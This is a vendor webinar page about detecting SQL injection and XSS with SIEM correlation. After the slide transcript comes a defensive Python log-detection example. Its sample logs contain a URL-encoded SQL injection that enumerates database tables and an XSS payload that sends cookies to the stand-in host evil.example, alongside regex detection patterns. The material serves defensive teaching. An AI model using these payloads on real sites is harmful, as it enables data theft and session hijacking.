
How to Detect SQL Injections & XSS Attacks Using SIEM Event Correlation


Two of the oldest and most common attacks used against web applications, SQL injection attacks and cross-site scripting attacks (XSS), continue to impact thousands of websites and millions of users each year. Finding these exposures quickly is essential in order to prevent system compromise and avoid information leakage. SIEM solutions can be invaluable in this effort by collecting and correlating the data you need to identify patterns that signal an attack.

Join AlienVault for this session to learn:

* What data you need to collect to identify the warning signs of an attack
* How to use event correlation to detect cross-site scripting (XSS) and SQL Injection attacks
* How to identify impacted assets so you can quickly limit the damage

You'll come away from the session with a clear picture of how to use SIEM technology to prevent these attacks.

Published in: Technology

  • Who do we sell to? How do we find them? How do we engage? Emphasis on categories in which we play (e.g. IDS, Vuln Assessment, Asset Discovery...). Quick market/vendor overview of these categories (high level competitive).
  • Most organizations look like this… there’s a myriad of security solutions in their environment all promising to deliver greater visibility.
  • So how do we do this? We've pieced together all of the necessary security tools to feed the correlation engine, provide meaningful data, and manage entire networks from a single pane of glass.
    - The essential elements of a SIEM are the ability to capture events and pull these into an engine that can parse, normalize, correlate, and log them.
    - What most folks in the security world will tell you is that in order to have a battle-tested security solution you need to extend the capabilities of that SIEM to take in other information than just the logs. And we've done just that.
    - First, we realize folks need to know what assets are on their system to protect. We do that by building in Asset Discovery tools, where we can automatically populate a database of assets on your network by scanning both passively and actively, identifying hosts and installed software packages.
    - Once we've identified what's on your networks at all times, we've built in the ability to find out where your system might be vulnerable. Vulnerability assessment tools allow us to cross-correlate vulnerability information with up-to-date detection rules to identify the weaknesses that hackers exploit.
    - On top of that, our built-in threat detection tools are actively searching for breach attempts. Our aim is to cover all of your bases, including host-based IDS, network IDS, File Integrity Monitoring and even wireless IDS.
    - The fourth piece is behavioral monitoring. Security teams need to track user behavior to get the coverage you need for unknown threats, typically exemplified by strange or anomalous network or system behavior. This includes netflow analysis, service availability and of course log collection and analysis for in-depth forensic investigations.
    - Finally, aggregating these security controls together for correlation and analysis provides the intelligence you need in order to stay ahead of the bad guys and be proactive instead of reactive in your security approach.
  • In fact, AlienVault offers the only unified security management solution to unify the five essential security capabilities you need for complete security visibility. This translates into rapid time to value – faster and easier audits, targeted remediation, and more seamless incident response.
  • Transcript

    • 1. HOW TO DETECT SQL INJECTION & XSS ATTACKS USING SIEM EVENT CORRELATION Tom D’Aquino, Sr. SIEM Engineer
    • 2. AGENDA
      - Today's Threat Landscape: Realities & Implications
      - Web Application Attacks: What are they and what harm can they bring?
      - Threat detection through correlation of NIDS, HIDS and IP Reputation
      - AlienVault Unified Security Management (USM) at a glance
      - Demo environment details
      - Live Demo of USM: data collection and correlation from a Network IDS to detect web application attacks; leveraging the OSSEC HIDS agent to monitor web server logs for web application attacks
    • 3. THREAT LANDSCAPE: OUR NEW REALITY More and more organizations are finding themselves in the crosshairs of various bad actors for a variety of reasons. The number of organizations experiencing high profile breaches is unprecedented; SMBs are increasingly the target. In 2012 (and we expect this to rise in 2013 and into 2014), 50% of all targeted attacks were aimed at businesses with fewer than 2,500 employees. In fact, the largest growth area for targeted attacks in 2013 was businesses with fewer than 250 employees; 31% of all attacks targeted them.
    • 4. THREAT LANDSCAPE: WEB APPLICATION ATTACKS XSS (Cross Site Scripting) and SQL Injection are common methods of attacking web applications. XSS attacks give attackers the ability to inject malicious code into websites they do not own. SQL Injection attacks allow attackers to extract information from a website such as sensitive user information or user credentials.
    • 5. THREAT LANDSCAPE: CROSS SITE SCRIPTING ATTACKS XSS attacks are typically used to compromise a user's local system and install malware, or to impersonate a user on some other website through cookie hijacking. XSS attacks typically require some kind of web form that allows users to post content to the website, such as comment forms on blog sites, forums, message boards, etc. XSS attacks are easy to carry out using tools like the Browser Exploitation Framework (BeEF): http://beefproject.com/
    • 6. THREAT LANDSCAPE: CROSS SITE SCRIPTING ATTACKS (CONTINUED) Once the script is inserted into the web page, it is automatically executed by the victim’s web browser when the web page is loaded.
    • 7. THREAT LANDSCAPE: SQL INJECTION ATTACKS SQL Injection attacks are commonly used to extract sensitive information from web applications. Examples include: user account information (i.e. email addresses and passwords), stored credit card data, and system configuration details.
    • 8. THREAT LANDSCAPE: SQL INJECTION ATTACKS (CONTINUED) There are SQL Injection tricks that hackers can use to find your interesting data, such as viewing all of the tables in the database:
    • 9. THE ALIENVAULT USM SOLUTION: NETWORK INTRUSION DETECTION Network IDS is embedded in our platform, giving you the ability to detect network level attacks, including identifying malicious web requests sent to your web server. Network IDS signatures are updated frequently to keep you on the front lines of advanced detection.
    • 10. THE ALIENVAULT USM SOLUTION: HOST INTRUSION DETECTION With Host IDS, you can monitor the logs of your IIS or Apache web server for indications of XSS and SQL Injection attacks.
      - Web server log monitoring
      - File integrity checking
      - Operating system logging
      - Centralized management
    • 11. THE ALIENVAULT USM SOLUTION: IP REPUTATION Tracking activity from attackers around the world allows AlienVault USM to alert you when known bad actors are hitting your web site. It automatically correlates known attackers with malicious activity detected from both the network and host intrusion detection systems.
    • 12. (Diagram of the five security capabilities)
      Asset Discovery (figure out what is valuable):
        - Active Network Scanning
        - Passive Network Scanning
        - Asset Inventory
        - Host-based Software Inventory
      Vulnerability Assessment (identify ways the target could be compromised):
        - Network Vulnerability Testing
      Threat Detection (start looking for threats):
        - Network IDS
        - Host IDS
        - Wireless IDS
        - File Integrity Monitoring
      Behavioral Monitoring (look for strange activity which could indicate a threat):
        - Log Collection
        - Netflow Analysis
        - Service Availability Monitoring
      Security Intelligence (piece it all together):
        - SIEM Correlation
        - Incident Response
    • 13. UNIFIED SECURITY MANAGEMENT “Security Intelligence through Integration that we do, NOT you” USM Platform:
      - Bundled Products - 30 Open-Source Security tools to plug the gaps in your existing controls
      - USM Framework - Configure, Manage, & Run Security Tools. Visualize output and run reports
      - USM Extension API - Support for inclusion of any other data source into the USM Framework
      - Open Threat Exchange - Provides threat intelligence for collaborative defense
    • 14. DEMO NETWORK DETAILS The demo environment that we are testing in today contains the following:
    • 15. NON-DEFAULT CONFIGURATION Apache access.log monitoring is not a default behavior of the AlienVault HIDS agent
    • 16. NOW FOR SOME Q&A… Three Ways to Test Drive AlienVault:
      - Download a Free 30-Day Trial: http://www.alienvault.com/free-trial
      - Try our Interactive Demo Site: http://www.alienvault.com/live-demo-site
      - Join us for a live Demo: http://www.alienvault.com/marketing/alienvault-usmlive-demo
      Questions? hello@alienvault.com
    • 17. VIEW ON-DEMAND VIDEO To view a recorded version of this webcast On-Demand CLICK HERE
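An added example, not code from the webinar or from AlienVault, of the detection logic slides 10, 11 and 15 describe: monitoring Apache access.log lines for SQL injection and XSS indicators and escalating hits that come from a known bad actor. The log lines, the signature patterns and the reputation list are all constructed here for illustration; a real deployment would use the HIDS decoder rules and the USM reputation feed instead.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format access.log lines (sample data, not from the webinar).
ACCESS_LOG = """\
203.0.113.7 - - [10/Oct/2013:13:55:36 -0700] "GET /index.php?id=1 HTTP/1.1" 200 2326
198.51.100.23 - - [10/Oct/2013:13:55:40 -0700] "GET /index.php?id=1%27%20UNION%20SELECT%20table_name%20FROM%20information_schema.tables-- HTTP/1.1" 500 512
203.0.113.7 - - [10/Oct/2013:13:56:02 -0700] "GET /search?q=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fevil.example%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 1024
192.0.2.55 - - [10/Oct/2013:13:56:10 -0700] "GET /blog/post?id=42 HTTP/1.1" 200 4096
"""

# Constructed stand-in for an IP reputation feed of known bad actors (assumption).
BAD_ACTORS = {"198.51.100.23"}

# Combined Log Format: client ip, identity, user, [timestamp], "request", status, bytes.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Indicator patterns applied to the URL-decoded request, the same class of
# signature an NIDS or a HIDS log decoder matches against web requests.
SIGNATURES = {
    "sqli": re.compile(r"(?i)\bunion\b.+\bselect\b|information_schema|'\s*or\s*'?\d|--\s*$"),
    "xss": re.compile(r"(?i)<script\b|javascript:|onerror\s*=|document\.cookie"),
}

def parse_line(line):
    """Parse one access.log line into a dict, decoding the request path."""
    m = LOG_RE.match(line)
    if not m:
        return None  # unparseable line: skip it rather than stop the collector
    rec = m.groupdict()
    rec["decoded"] = unquote_plus(rec["path"])  # payloads arrive URL-encoded; decode first
    return rec

def classify(rec):
    """Return the attack types whose signatures match the decoded request."""
    return [name for name, rx in SIGNATURES.items() if rx.search(rec["decoded"])]

def correlate(log_text, bad_actors=BAD_ACTORS):
    """Return (source_ip, attack_type, priority) alerts. A signature hit from an
    address on the reputation list is escalated to high priority, mirroring the
    HIDS/NIDS plus IP reputation correlation the slides describe."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for kind in classify(rec):
            priority = "high" if rec["ip"] in bad_actors else "medium"
            alerts.append((rec["ip"], kind, priority))
    return alerts
```

Running `correlate(ACCESS_LOG)` yields one high-priority SQL injection alert for the listed bad actor and one medium-priority XSS alert; the benign requests produce nothing.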